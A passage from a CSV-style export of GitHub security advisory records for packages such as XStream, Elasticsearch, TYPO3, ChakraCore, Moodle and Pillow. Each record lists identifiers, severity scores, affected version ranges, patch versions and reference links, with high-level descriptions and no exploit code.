'https://github.com/x-stream/xstream/security/advisories/GHSA-hrcp-8f3q-4w2c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21351'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21351.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:27:18Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}" +1.4.0,GHSA-5fvx-2jj3-6mff,2021-03-16T01:19:41Z,2021-03-18T19:27:27Z,,['CVE-2021-22132'],Insufficiently Protected Credentials in Elasticsearch,Elasticsearch versions 7.7.0 to 7.10.1 contain an information disclosure flaw in the async search API. Users who execute an async search will improperly store the HTTP headers. An Elasticsearch user with the ability to read the .tasks index could obtain sensitive request headers of other users in the cluster. This issue is fixed in Elasticsearch 7.10.2,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.7.0'}, {'fixed': '7.10.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22132'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elasticsearch-7-10-2-security-update/261164'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210219-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-522'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T01:19:41Z', 'nvd_published_at': '2021-01-14T20:15:00Z'}" +1.4.0,GHSA-x7hc-x7fm-f7qh,2021-03-23T01:42:20Z,2021-03-23T01:54:17Z,,['CVE-2021-21370'],Cross-Site Scripting in Content Preview (CType menu),"> ### Meta +> * CVSS: `AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (4.1) +> * CWE-79 +> * Status: **DRAFT** + +### Problem +It has been discovered that content elements of type _menu_ are vulnerable to cross-site scripting when their referenced items get previewed in the page module. A valid backend user account is needed to exploit this vulnerability. + +### Solution +Update to TYPO3 versions 7.6.51, 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described. + +### Credits +Thanks to TYPO3 contributor Oliver Bartsch who reported and fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-008](https://typo3.org/security/advisory/typo3-core-sa-2021-008)",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.6.51'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.6.50'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.40'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.7.39'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.5.24'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.13'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-x7hc-x7fm-f7qh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21370'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/typo3/cms-backend'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-008'}]","{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T01:42:20Z', 'nvd_published_at': '2021-03-23T02:15:00Z'}" +1.4.0,GHSA-9735-p6r2-2hgh,2021-03-18T21:25:17Z,2021-03-29T21:00:00Z,,['CVE-2019-0911'],Out-of-bounds write,"A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0884, CVE-2019-0918.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0911'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/a2deba5e1850782014a2a34678464b251e448337'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0911'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:25:17Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-gmrf-99gw-vvwj,2021-03-11T17:41:49Z,2021-03-11T17:42:08Z,,[],/user/sessions endpoint allows detecting valid accounts,"This Security Advisory is about a vulnerability in eZ Platform v1.13, v2.5, and v3.2, and in Ibexa DXP and Ibexa Open Source v3.3. The /user/sessions endpoint can let an attacker detect if a given username or email refers to a valid account. This can be detected through differences in the response data or response time of certain requests. The fix ensures neither attack is possible. The fix is distributed via Composer. + +If you come across a security issue in our products, here is how you can report it to us: https://doc.ibexa.co/en/latest/guide/reporting_issues/#toc",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.13.0'}, {'fixed': '6.13.8.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.13.8.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.5.0'}, {'fixed': '7.5.15.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.5.15.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-gmrf-99gw-vvwj'}, {'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/commit/b496f073c3f03707d3531a6941dc098b84e3cbed'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/ezsystems/ezpublish-kernel'}]","{'cwe_ids': ['CWE-203'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-11T17:41:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-6973-94v8-5mgw,2021-03-19T20:42:16Z,2021-03-29T20:57:42Z,,['CVE-2019-0991'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0989, CVE-2019-0992, CVE-2019-0993, CVE-2019-1002, CVE-2019-1003, CVE-2019-1024, CVE-2019-1051, CVE-2019-1052.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0991'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/1caa4118796d33513bc40ce894c053a92de98abb'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/3d6226cc2d1077537220361c82e34a362c6c76ee'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0991'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T20:42:16Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}" +1.4.0,GHSA-g9fw-9x87-rmrj,2022-06-06T17:56:25Z,2021-03-18T19:27:13Z,,['CVE-2020-7020'],Privilege Context Switching Error in Elasticsearch,Elasticsearch versions before 6.8.13 and 7.9.2 contain a document disclosure flaw when Document or Field Level Security is used. Search queries do not properly preserve security permissions when executing certain complex queries. This could result in the search disclosing the existence of documents the attacker should not be able to view. This could result in an attacker gaining additional insight into potentially sensitive indices.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.8.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.9.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7020'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elastic-stack-7-9-3-and-6-8-13-security-update/253033'}, {'type': 'PACKAGE', 'url': 'https://github.com/elastic/elasticsearch'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20201123-0001/'}, {'type': 'WEB', 'url': 'https://staging-website.elastic.co/community/security/'}]","{'cwe_ids': ['CWE-269', 'CWE-270'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T16:31:38Z', 'nvd_published_at': '2020-10-22T17:15:00Z'}" +1.4.0,GHSA-93wh-35r4-6qmw,2022-08-11T16:37:15Z,2021-03-29T20:43:23Z,,['CVE-2021-20281'],Moodle allowed some users without permission to view other users' full names,"It was possible for some users without permission to view other users' full names to do so via the online users block in moodle before 3.10.2, 3.9.5, 3.8.8, 3.5.17.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0'}, {'fixed': '3.10.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5'}, {'fixed': '3.5.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20281'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/33d6017287e1835513a3de8edd3fbf7a6a90af9c'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1939041'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AFSNJ7XHVTC52RSRX2GBQFF3VEEAY2MS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFH5DDMU5TZ3JT4Q52WMRAHACA5MHIMT/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=419652'}]","{'cwe_ids': ['CWE-200', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:14:27Z', 'nvd_published_at': '2021-03-15T22:15:00Z'}" +1.4.0,GHSA-w32p-76xr-88pc,2021-03-18T22:20:51Z,2021-03-29T20:59:06Z,,['CVE-2019-1003'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0989, CVE-2019-0991, CVE-2019-0992, CVE-2019-0993, CVE-2019-1002, CVE-2019-1024, CVE-2019-1051, CVE-2019-1052.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1003'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/3d6226cc2d1077537220361c82e34a362c6c76ee'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/90f67afac6362828c750f3bccbcc1c360caf29e4'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1003'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:20:51Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}" +1.4.0,GHSA-7423-5qfm-g648,2021-03-18T21:51:29Z,2021-03-29T21:00:09Z,,['CVE-2019-0916'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0916'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d85b5025b047f10784c53c6c1dd771775d417f5f'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0916'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:51:29Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}" +1.4.0,GHSA-gfp2-w5jm-955q,2021-03-29T17:30:03Z,2021-03-23T15:26:34Z,,['CVE-2021-21376'],OMERO.web exposes some unnecessary session information in the page,"### Background +OMERO.web loads various information about the current user such as their id, name and the groups they are in, and these are available on the main webclient pages. Some additional information being loaded is not used by the webclient and is being removed in this release. + +### Impact +OMERO.web before 5.9.0 + +### Patches +5.9.0 + +### Workarounds +No workaround + +### References + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [omero-web](https://github.com/ome/omero-web) +* Email us at [security](mailto:security@openmicroscopy.org.uk)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'omero-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ome/omero-web/security/advisories/GHSA-gfp2-w5jm-955q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21376'}, {'type': 'WEB', 'url': 'https://github.com/ome/omero-web/commit/952f8e5d28532fbb14fb665982211329d137908c'}, {'type': 'WEB', 'url': 'https://github.com/ome/omero-web/blob/master/CHANGELOG.md#590-march-2021'}, {'type': 'WEB', 'url': 'https://pypi.org/project/omero-web/'}, {'type': 'WEB', 'url': 'https://www.openmicroscopy.org/security/advisories/2021-SV1/'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:25:08Z', 'nvd_published_at': '2021-03-23T16:15:00Z'}" +1.4.0,GHSA-59jw-jqf4-3wq3,2022-02-08T21:33:08Z,2021-03-22T23:28:23Z,,['CVE-2021-21344'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21344](https://x-stream.github.io/CVE-2021-21344.html). + +### Credits +钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-59jw-jqf4-3wq3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21344'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21344.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:23:49Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}" +1.4.0,GHSA-mx3r-w3pj-7wv7,2021-03-23T21:26:23Z,2021-03-19T21:10:30Z,2021-03-23T21:26:23Z,['CVE-2020-28431'],Command injection in wc-cmd,** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'wc-cmd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28431'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-WCCMD-1050423'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T23:48:14Z', 'nvd_published_at': '2021-02-23T16:15:00Z'}" +1.4.0,GHSA-545q-3fg6-48m7,2023-09-12T20:51:14Z,2021-03-18T19:39:31Z,,['CVE-2021-23346'],html-parse-stringify and html-parse-stringify2 vulnerable to Regular expression denial of service (ReDoS),"This affects the package html-parse-stringify before 2.0.1; all versions of package html-parse-stringify2. Sending certain input could cause one of the regular expressions that is used for parsing to backtrack, freezing the process.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'html-parse-stringify'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'html-parse-stringify2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23346'}, {'type': 'WEB', 'url': 'https://github.com/HenrikJoreteg/html-parse-stringify/commit/c7274a48e59c92b2b7e906fedf9065159e73fe12'}, {'type': 'WEB', 'url': 'https://github.com/HenrikJoreteg/html-parse-stringify/blob/master/lib/parse.js%23L2'}, {'type': 'WEB', 'url': 'https://github.com/HenrikJoreteg/html-parse-stringify/releases/tag/v2.0.1'}, {'type': 'WEB', 'url': 'https://github.com/rayd/html-parse-stringify2/blob/master/lib/parse.js%23L2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1080633'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HTMLPARSESTRINGIFY-1079306'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HTMLPARSESTRINGIFY2-1079307'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:03:51Z', 'nvd_published_at': '2021-03-04T17:15:00Z'}" +1.4.0,GHSA-jff3-mwp3-f8cw,2021-03-09T00:29:44Z,2021-03-09T00:38:31Z,,['CVE-2021-21360'],Exposure of Sensitive Information to an Unauthorized Actor in Products.GenericSetup,"### Impact +_What kind of vulnerability is it? Who is impacted?_ + +Information disclosure vulnerability - anonymous visitors may view log and snapshot files generated by the Generic Setup Tool. + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ + +The problem has been fixed in version 2.1.1. Depending on how you have installed Products.GenericSetup, you should change the buildout version pin to 2.1.1 and re-run the buildout, or if you used pip simply do pip install `""Products.GenericSetup>=2.1.1""` + +### Workarounds +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ + +Visit the ZMI Security tab at `portal_setup/manage_access` and click on the link _Access contents information_. On the next page, uncheck the box _Also use roles acquired from folders containing this objects_ at the bottom and check the boxes for _Manager_ and _Owner_. Then click on _Save Changes_. Return to the ZMI Security tab at `portal_setup/manage_access` and scroll down to the link _View_. Click on _View_, uncheck the box _Also use roles acquired from folders containing this objects_ at the bottom and check the boxes for _Manager_ and _Owner_. Then click on _Save Changes_. + +### References +_Are there any links users can visit to find out more?_ + +- [GHSA-jff3-mwp3-f8cw](https://github.com/zopefoundation/Products.GenericSetup/security/advisories/GHSA-jff3-mwp3-f8cw) +- [Products.GenericSetup on PyPI](https://pypi.org/project/Products.GenericSetup/) +- [Definition of information disclosure at MITRE](https://cwe.mitre.org/data/definitions/200.html) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in the [Products.GenericSetup issue tracker](https://github.com/zopefoundation/Products.GenericSetup/issues) +* Email us at [security@plone.org](mailto:security@plone.org)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'Products.GenericSetup'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.GenericSetup/security/advisories/GHSA-jff3-mwp3-f8cw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21360'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.GenericSetup/commit/700319512b3615b3871a1f24e096cf66dc488c57'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Products.GenericSetup/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/21/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-09T00:29:44Z', 'nvd_published_at': '2021-03-09T01:15:00Z'}" +1.4.0,GHSA-57h3-9rgr-c24m,2021-12-02T17:48:12Z,2021-03-29T16:35:16Z,,['CVE-2021-25289'],Out of bounds write in Pillow,An issue was discovered in Pillow before 8.1.1. TiffDecode has a heap-based buffer overflow when decoding crafted YCbCr files because of certain interpretation conflicts with LibTIFF in RGBA mode. NOTE: this issue exists because of an incomplete fix for CVE-2020-35654.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1.0'}, {'fixed': '8.1.1'}]}], 'versions': ['8.1.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25289'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/3fee28eb9479bf7d59e0fa08068f9cc4a6e2f04c'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow/'}, {'type': 'WEB', 'url': 